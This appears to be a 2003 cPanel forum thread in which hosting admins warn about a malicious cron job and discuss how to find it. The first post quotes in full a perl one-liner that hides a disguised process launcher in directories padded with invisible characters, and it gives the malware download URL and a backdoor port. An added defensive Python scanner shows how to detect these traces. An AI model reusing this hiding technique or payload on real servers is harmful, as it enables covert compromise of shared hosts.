The Community Forums

Interact with an entire community of cPanel & WHM users!

If you allow cronjobs

Discussion in 'General Discussion' started by dgbaker, May 17, 2003.

  1. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    If you allow users to set up cronjobs, watch for the following.

    perl -e '$e="httpd";$b="/usr/local/apache/bin/httpd -DSSL";$r="/home/username/public_html/forum/db";$l3=$l2=$l1=sprintf (".x\%s \%s \%s",chr(0xa0),chr(0xa0),chr(0xa0));chdir $r;chmod 0755,"$l1";chdir "$l1";chmod 0755,"$l2";chdir "$l2";chdir "$l3";open(CHK,">chkit");print CHK "#!/bin/sh\n./$e max.pl \"$b\"&>out\n";close CHK;chmod 0755,"chkit";`./chkit`;chdir "../..";chmod 0,"$l2";chdir "..";chmod 0,"$l1"': 489 Time(s)


    In most cases this user is an innocent victim and it is actually another user doing the real damage.

    The script that is being installed is this one.

    http://ibitzica.com/m.tgz

    Look for this in home directories, or search for CRONEXE; it is one of the variables that is set up in the PHP install file.

    If you are seeing abnormal Apache failures, extreme bandwidth usage, or suspect any backdoors or such, check for this. It will be trying to set up PSYBNC.SYSTEM.PORT1=1124.

    So make sure your firewalls are blocking this port.
     
  2. FWC

    FWC Well-Known Member

    Location:
    Ontario, Canada
    Thanks for the tip, David. Something else to keep an eye on. :rolleyes:
     
  3. jackal

    jackal Well-Known Member
    PartnerNOC

    Hey David, we had a signup the other day for a yearly package that had this installed; we found it within 30 minutes. We sent him around 5 emails, no response, then we suspended the account. That made him come out from hiding. We actually talked with him on ICQ after we found it. But this was a strange guy with strange responses. We finally just deleted his account.
     
  4. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Good find!

    Our biggest thing with this was that it was able to install in two other people's home directories.

    Make sure to do a good, thorough search for hidden directories like .x, and search for the max.pl script as well.
     
    #4 dgbaker, May 17, 2003
    Last edited: May 17, 2003
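    A defender-side scan for the traces this thread describes (the padded ".x" directory and chmod 0 from the cron entry in post 1, and the hidden directories and max.pl that post 4 says to search for), added here as an example and not part of the original posts. The sample directory tree and crontab lines it builds are constructed; the dropped-file name list and the cron regex are assumptions drawn from the quoted entry.

```python
import os
import re
import shutil
import stat
import tempfile

# Indicators from the cron entry in post 1 and post 4's search advice: a ".x" directory padded
# with spaces and raw 0xA0 bytes, chmod 0 on it, and the dropped files (chkit runs "httpd" from it).
DROPPED_FILES = {b"max.pl", b"chkit", b"httpd", b"m.tgz"}
CRON_RE = re.compile(r"perl\s+-e\s.*(chr\(0xa0\)|chmod\s+0,)", re.I)
# Constructed two-line crontab: a shortened form of the post 1 entry plus a harmless job.
SAMPLE_CRON = "0 * * * * perl -e '$l1=sprintf(\".x\\%s\",chr(0xa0));chmod 0,\"$l1\"'\n0 4 * * * /bin/true"

def is_disguised_name(name: bytes) -> bool:
    """Dot-name padded with space, tab, 0xA0 or control bytes so it looks blank in ls -la."""
    return name.startswith(b".") and any(b in (0x20, 0x09, 0xA0) or b < 0x20 for b in name)

def scan_tree(root: bytes) -> list:
    """Walk a home dir with bytes paths (raw 0xA0 names survive); mode-0 dirs need root to enter."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            if is_disguised_name(d):
                findings.append(("disguised-dirname", full))
            if stat.S_IMODE(os.lstat(full).st_mode) == 0:
                findings.append(("mode-000-dir", full))
        for f in filenames:
            if f in DROPPED_FILES:
                findings.append(("dropped-file", os.path.join(dirpath, f)))
    return findings

def suspicious_cron_lines(crontab_text: str) -> list:
    """Crontab lines that build the hidden tree with perl -e, as the post 1 entry does."""
    return [ln for ln in crontab_text.splitlines() if CRON_RE.search(ln)]

def build_sample_tree() -> bytes:
    root = tempfile.mkdtemp(prefix="homescan-").encode()  # constructed sample layout
    hidden = os.path.join(root, b"public_html", b"forum", b"db", b".x\xa0 \xa0 \xa0")
    os.makedirs(hidden)
    open(os.path.join(hidden, b"max.pl"), "wb").close()
    os.mkdir(os.path.join(root, b".locked"), 0)  # a chmod-0 directory, as the entry leaves
    return root

def demo_scan() -> list:
    root = build_sample_tree()
    reasons = sorted(r for r, _ in scan_tree(root))
    os.chmod(os.path.join(root, b".locked"), 0o700)  # restore so rmtree can remove it
    shutil.rmtree(root)
    return reasons
```

On a real server run scan_tree as root over each /home/* directory and suspicious_cron_lines over each file under /var/spool/cron, since only root can descend into the chmod-0 directories.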
  5. jamesbond

    jamesbond Well-Known Member

    That's not good :(

    How did they manage to do that? And how to prevent this?
     
  6. jackal

    jackal Well-Known Member
    PartnerNOC

    No max.pl found, David. Sent you a PM, David.
     
  7. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    That's the lovely thing with that script, it allows that to happen.
     
  8. sexy_guy

    sexy_guy Well-Known Member

    I'm sorry, but if you have a decent firewall that only opens what you need, why would we be careful with port 1124? I don't know about you, but I don't open unused ports. :rolleyes:
     
  9. sexy_guy

    sexy_guy Well-Known Member

    FYI, max.pl is part of the Webmin suite that we use on our server. A check resulted in the following:

    root@srv05 [/var/log]# locate max.pl
    /usr/local/src/webmin-1.060/useradmin/help/max.pl.html
     
  10. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Re: Re: If you allow cronjobs

    Umm, neither do we, but is informing others a bad thing now? Also, if you're using software firewalls on your server, they can be taken down. Any exploit that gets through Apache and can gain root can change that port. Checking your ports regularly is called being diligent with your server security.

    Just because a firewall blocks it I am still not going to allow users to even try using this stuff. For us and the other clients I deal with, there is a zero tolerance for any cr@p.

    If you're not checking for these types of things, firewall or not, it is no wonder you seem to have abundantly more problems than most of us have encountered.
     
    #10 dgbaker, May 18, 2003
    Last edited: May 18, 2003
  11. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    So, does that mean if I name a file something that belongs to another program I can run it freely on your system no matter what the code is? Cool, can I have an account with you?

    Also, that is not max.pl but max.pl.html, see the difference?

    html versus perl = two different languages
     